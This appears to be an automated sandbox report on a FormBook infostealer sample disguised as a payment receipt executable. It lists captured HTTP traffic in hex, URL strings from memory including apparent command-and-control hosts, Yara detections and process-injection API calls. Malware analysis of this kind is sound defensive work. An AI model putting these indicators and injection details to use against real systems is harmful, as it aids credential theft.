                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 09:27:38 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 09:27:40 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 09:27:43 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 09:27:45 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36
                Source: wlanext.exe, 00000011.00000002.4519605588.00000000048DC000.00000004.10000000.00040000.00000000.sdmp, VfJW2xm7a.exe, 00000012.00000002.4519083493.000000000324C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
                Source: PAYMENT RECEIPT_USD21,000.exe, fttQgpyzkkc.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                Source: PAYMENT RECEIPT_USD21,000.exe, fttQgpyzkkc.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                Source: PAYMENT RECEIPT_USD21,000.exe, fttQgpyzkkc.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                Source: wlanext.exe, 00000011.00000002.4519605588.000000000474A000.00000004.10000000.00040000.00000000.sdmp, VfJW2xm7a.exe, 00000012.00000002.4519083493.00000000030BA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://primepath.net/w1jw/?fjF4t=FEsgf818Qy4NuwHBEIOvD988sEsBYT1YIqxYhkBisKCh
                Source: PAYMENT RECEIPT_USD21,000.exe, 00000000.00000002.2120736278.0000000002D7A000.00000004.00000800.00020000.00000000.sdmp, fttQgpyzkkc.exe, 0000000A.00000002.2220394453.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: PAYMENT RECEIPT_USD21,000.exe, fttQgpyzkkc.exe.0.drString found in binary or memory: http://tempuri.org/EchipamenteDataSet.xsd
                Source: VfJW2xm7a.exe, 00000012.00000002.4520833755.0000000004CC5000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.arasmm.info
                Source: VfJW2xm7a.exe, 00000012.00000002.4520833755.0000000004CC5000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.arasmm.info/ss5l/
                Source: wlanext.exe, 00000011.00000003.2464492291.000000000825D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: wlanext.exe, 00000011.00000003.2464492291.000000000825D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: wlanext.exe, 00000011.00000002.4519605588.0000000004F24000.00000004.10000000.00040000.00000000.sdmp, VfJW2xm7a.exe, 00000012.00000002.4519083493.0000000003894000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
                Source: wlanext.exe, 00000011.00000003.2464492291.000000000825D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: wlanext.exe, 00000011.00000003.2464492291.000000000825D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: wlanext.exe, 00000011.00000003.2464492291.000000000825D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: wlanext.exe, 00000011.00000003.2464492291.000000000825D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: wlanext.exe, 00000011.00000003.2464492291.000000000825D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: wlanext.exe, 00000011.00000002.4517846473.0000000003448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: wlanext.exe, 00000011.00000002.4517846473.0000000003448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: wlanext.exe, 00000011.00000002.4517846473.0000000003448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
                Source: wlanext.exe, 00000011.00000002.4517846473.0000000003448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2N
                Source: wlanext.exe, 00000011.00000002.4517846473.0000000003448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: wlanext.exe, 00000011.00000002.4517846473.0000000003448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=10336
                Source: wlanext.exe, 00000011.00000002.4517846473.0000000003448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: wlanext.exe, 00000011.00000002.4517846473.0000000003448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: wlanext.exe, 00000011.00000002.4517846473.0000000003448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: wlanext.exe, 00000011.00000003.2458767739.0000000008233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: wlanext.exe, 00000011.00000002.4519605588.0000000004A6E000.00000004.10000000.00040000.00000000.sdmp, VfJW2xm7a.exe, 00000012.00000002.4519083493.00000000033DE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.mydevil.net/grad.png
                Source: wlanext.exe, 00000011.00000002.4519605588.0000000004A6E000.00000004.10000000.00040000.00000000.sdmp, VfJW2xm7a.exe, 00000012.00000002.4519083493.00000000033DE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.mydevil.net/logo5.png
                Source: PAYMENT RECEIPT_USD21,000.exe, fttQgpyzkkc.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                Source: wlanext.exe, 00000011.00000003.2464492291.000000000825D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: wlanext.exe, 00000011.00000003.2464492291.000000000825D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: wlanext.exe, 00000011.00000002.4519605588.0000000004A6E000.00000004.10000000.00040000.00000000.sdmp, VfJW2xm7a.exe, 00000012.00000002.4519083493.00000000033DE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.mydevil.net
                Source: wlanext.exe, 00000011.00000002.4519605588.0000000004A6E000.00000004.10000000.00040000.00000000.sdmp, VfJW2xm7a.exe, 00000012.00000002.4519083493.00000000033DE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.mydevil.net/favicon.ico
                Source: VfJW2xm7a.exe, 00000012.00000002.4519083493.00000000033DE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.mydevil.net/kontakt.html

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000011.00000002.4517196655.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.4517755223.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2279407307.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2280315189.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.4517662913.0000000003370000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2281808721.0000000001580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.4518790088.0000000003230000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: PAYMENT RECEIPT_USD21,000.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0042C933 NtClose,9_2_0042C933
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011235C0 NtCreateMutant,LdrInitializeThunk,9_2_011235C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01122B60 NtClose,LdrInitializeThunk,9_2_01122B60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01122DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_01122DF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01122C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_01122C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01123010 NtOpenDirectoryObject,9_2_01123010
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01123090 NtSetValueKey,9_2_01123090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01124340 NtSetContextThread,9_2_01124340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01124650 NtSuspendThread,9_2_01124650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011239B0 NtGetContextThread,9_2_011239B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01122B80 NtQueryInformationFile,9_2_01122B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01122BA0 NtEnumerateValueKey,9_2_01122BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01122BF0 NtAllocateVirtualMemory,9_2_01122BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01122BE0 NtQueryValueKey,9_2_01122BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01122AB0 NtWaitForSingleObject,9_2_01122AB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01122AD0 NtReadFile,9_2_01122AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01122AF0 NtWriteFile,9_2_01122AF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01122D10 NtMapViewOfSection,9_2_01122D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01123D10 NtOpenProcessToken,9_2_01123D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01122D00 NtSetInformationFile,9_2_01122D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01122D30 NtUnmapViewOfSection,9_2_01122D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01123D70 NtOpenThread,9_2_01123D70
